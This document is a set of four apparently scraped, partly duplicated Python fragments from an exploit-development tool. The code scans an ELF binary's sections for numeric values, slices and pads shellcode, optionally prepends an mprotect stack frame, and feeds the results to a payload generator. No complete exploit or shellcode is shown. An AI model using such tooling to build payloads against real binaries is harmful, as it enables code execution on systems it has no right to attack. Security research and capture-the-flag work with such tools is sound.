Example #1
	if prepend_mprotect:
		bin_shellcode = "%s%s" % (build_mprotect_stack(stack_frame, stack_frame + 0x10), hex_str_repr_2_str(shellcode))
	else:
		bin_shellcode = hex_str_repr_2_str(shellcode)

	try:
		f = open(binary, "rb")
	except Exception as ex:
		print("Can't open file %s: %s" % (argv[1], ex), file=stderr)
		exit(1)

	if bin_shellcode is not None:
		slices = slice_shellcode(switch_endianness(pad_shellcode(bin_shellcode, pad_char="\x00")))
		print(slices)
		slice_gaps = get_slice_gaps(slices)
		candidates = get_numbers(f, section_names, 0xffffffff, use_segment=use_segment, no_null_bytes=True)
		#candidates = get_numbers(f, section_names, slice_gaps[0][1], use_segment=True, no_null_bytes=True)
		f.close()
		coins = list(set(candidates.values()))

		pg = PayloadGenerator()
		if prologue:
			python_code += pg.add_prologue()

		first = True
		for gap in slice_gaps:
			# Not elegant, but for first element, remove the initial value of accumulator register
			if first:
				first_gap = list(gap)
				accumulator_value += first_gap[1] - 1
				first_gap[1] = abs(cmp2(first_gap[1] - initial_reg_value))
Example #2
    if (section_names is None) and (not use_segment):
        section_names = (".interp", ".note.ABI-tag", ".hash", ".gnu.hash",
                         ".dynsym", ".dynstr", ".gnu.version",
                         ".gnu.version_r", ".rel.dyn", ".rel.plt", ".init",
                         ".plt", ".text", ".fini", ".rodata", ".eh_frame",
                         ".comment")
    elif (section_names is None) and use_segment:
        section_names = (".text", ".data")

    try:
        f = open(args.filename, "rb")
    except Exception as ex:
        print("Can't open file %s: %s" % (argv[1], ex), file=stderr)
        exit(1)

    candidates = get_numbers(f, section_names, change, exclude, use_segment,
                             no_null_bytes)
    f.close()

    if candidates != None:
        unique_values = set(candidates.values())
        #oper, results = solve_dp(list(unique_values), change)

        oper, results = solve_gready(list(unique_values), change)

        if oper != 0:
            print("Found a solution using %u operations: %s" % (oper, results))
        else:
            print("No solution was found. Exiting...", file=stderr)
            exit(2)
    else:
        print("Found no candidate numbers in elf file. Exiting...",
Example #3
        bin_shellcode = hex_str_repr_2_str(shellcode)

    try:
        f = open(binary, "rb")
    except Exception as ex:
        print("Can't open file %s: %s" % (argv[1], ex), file=stderr)
        exit(1)

    if bin_shellcode is not None:
        slices = slice_shellcode(
            switch_endianness(pad_shellcode(bin_shellcode, pad_char="\x00")))
        print(slices)
        slice_gaps = get_slice_gaps(slices)
        candidates = get_numbers(f,
                                 section_names,
                                 0xffffffff,
                                 use_segment=use_segment,
                                 no_null_bytes=True)
        #candidates = get_numbers(f, section_names, slice_gaps[0][1], use_segment=True, no_null_bytes=True)
        f.close()
        coins = list(set(candidates.values()))

        pg = PayloadGenerator()
        if prologue:
            python_code += pg.add_prologue()

        first = True
        for gap in slice_gaps:
            # Not elegant, but for first element, remove the initial value of accumulator register
            if first:
                first_gap = list(gap)
Example #4
			exclude.append(0)
		else:
			exclude = [0]
	
	if (section_names is None) and (not use_segment):
		section_names = (".interp", ".note.ABI-tag", ".hash", ".gnu.hash", ".dynsym", ".dynstr", ".gnu.version", ".gnu.version_r", ".rel.dyn", ".rel.plt", ".init", ".plt", ".text", ".fini", ".rodata", ".eh_frame", ".comment")
	elif (section_names is None) and use_segment:
		section_names = (".text", ".data")
	
	try:
		f = open(args.filename, "rb")
	except Exception as ex:
		print("Can't open file %s: %s" % (argv[1], ex), file=stderr)
		exit(1)

	candidates = get_numbers(f, section_names, change, exclude, use_segment, no_null_bytes)
	f.close()
	
	if candidates != None:
		unique_values = set(candidates.values())
		#oper, results = solve_dp(list(unique_values), change)

		oper, results = solve_gready(list(unique_values), change)

		if oper != 0:
			print("Found a solution using %u operations: %s" % (oper, results))
		else:
			print("No solution was found. Exiting...", file=stderr)
			exit(2)
	else:
		print("Found no candidate numbers in elf file. Exiting...", file=stderr)